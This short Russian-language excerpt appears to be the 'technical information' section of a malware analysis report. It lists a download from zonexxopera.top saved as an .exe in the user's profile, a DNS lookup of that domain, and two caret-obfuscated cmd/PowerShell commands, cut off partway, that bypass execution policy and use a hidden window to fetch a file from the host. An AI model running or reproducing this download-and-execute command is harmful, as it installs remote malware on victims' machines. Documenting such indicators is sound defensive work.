Техническая информация
- http://zonexxopera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OWer^Sh^eLl.^eXe^ ^-eXe^c^utIoN^P^oL^Icy By^P^As^S ^-^N^O^proFiLE -WI^ndO^WSTYl^e ^HIDd^eN ^(n^Ew-o^BjECt^ s^Y^Stem.n^E^T^.web^cl^IENT).doW^n^L^oAD^F^IlE^('http://zonexxopera.top...
- DNS ASK zo###xopera.top
- '<SYSTEM32>\cmd.exe' /C "P^OWer^Sh^eLl.^eXe^ ^-eXe^c^utIoN^P^oL^Icy By^P^As^S ^-^N^O^proFiLE -WI^ndO^WSTYl^e ^HIDd^eN ^(n^Ew-o^BjECt^ s^Y^Stem.n^E^T^.web^cl^IENT).doW^n^L^oAD^F^IlE^('http://zonexxopera.top...' (со скрытым окном)